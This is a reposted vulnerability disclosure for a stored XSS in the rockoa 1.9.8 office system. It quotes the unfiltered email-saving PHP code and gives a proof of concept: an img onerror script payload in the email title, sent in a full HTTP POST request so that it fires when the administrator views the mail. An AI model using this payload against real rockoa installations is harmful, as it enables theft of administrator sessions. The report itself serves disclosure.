There is one Storage type XSS vulnerability that can js code execution in rockoa 1.9.8

最新推荐文章于 2023-12-21 13:16:25 发布

adminxw

最新推荐文章于 2023-12-21 13:16:25 发布

阅读量2.8k

点赞数

文章标签： vul

原文链接：https://github.com/alixiaowei/alixiaowei.github.io/issues/2

版权

Official website: http://www.rockoa.com/
demo link: http://demo.rockoa.com/
Vulnerability path: webmain/flow/input/mode_emailmAction.php

line: 34-63

protected function saveafter($table, $arr, $id, $addbo)
	{
		$isturn = (int)$arr['isturn'];
		$type 	= (int)$arr['type'];
		if($isturn==1){
			if($type==0){
				$this->flow->savesubmid($arr['receid'], $id, 0,0);
				$this->flow->savesubmid($arr['ccid'], $id, 1,0);
			}
			$this->flow->savesubmid($arr['sendid'], $id, 2,1);
			//外发发邮件的
			if($type == 1){
				$emsa = $this->getrecename($arr['receid']);
				if($emsa != ''){
					$ccsa 	= $this->getrecename($arr['ccid']);
					$fjar 	= m('file')->getfilepath('emailm', $id);
					m('email')->sendemailout($this->adminid, array(
						'title' 	=> $arr['title'],
						'body' 		=> $arr['content'],
						'receemail' => $emsa[0],
						'recename' 	=> $emsa[1],
						'ccemail' 	=> $ccsa[0],
						'ccname' 	=> $ccsa[1],
						'attachpath'=> $fjar[0],
						'attachname'=> $fjar[1],
					), 1);//自己发送，不异步
				}
			}
		}
	}

Send email no filtering of dangerous characters leads to XSS, which can be used to obtain administrator cookies.

Verification:

user: wangjing
wangjing(user) send email administrator
title:

<img src=x onerror=alert(/xss_test/)>

1571048502564
poc:

POST /xinhu/index.php?a=save&m=mode_emailm|input&d=flow&ajaxbool=true&rnd=897989 HTTP/1.1
Host: 192.168.174.136:829
Content-Length: 193
Accept: */*
Origin: http://192.168.174.136:829
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.174.136:829/xinhu/?a=lu&m=input&d=flow&num=emailm&mid=0&callback=
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=gjqr8gpe7g4dlrqjjjmfvl2ja4; deviceid=1571022073329; xinhu_ca_rempass=0; xinhu_mo_adminid=ru0tvv0mn0yn0ur0mt0rv0tvt0mm0tvv0mm0yr08; xinhu_ca_adminuser=wangj
Connection: close

id=0&title=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss_test%2F)%3E&type=0&isturn=1&recename=%E7%AE%A1%E7%90%86%E5%91%98&receid=u1&ccname=&ccid=&content=xss_test&fileid=&sysmodeid=47&sysmodenum=emailm

After the administrator logged Trigger XSS
1571048695750

adminxw

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
There is one Storage type XSS vulnerability that can js code execution in rockoa 1.9.8

Official website: http://www.rockoa.com/demo link: http://demo.rockoa.com/Vulnerability path: webmain/flow/input/mode_emailmAction.phpline: 34-63protected function saveafter($table, $arr, $id, $ad...
复制链接

扫一扫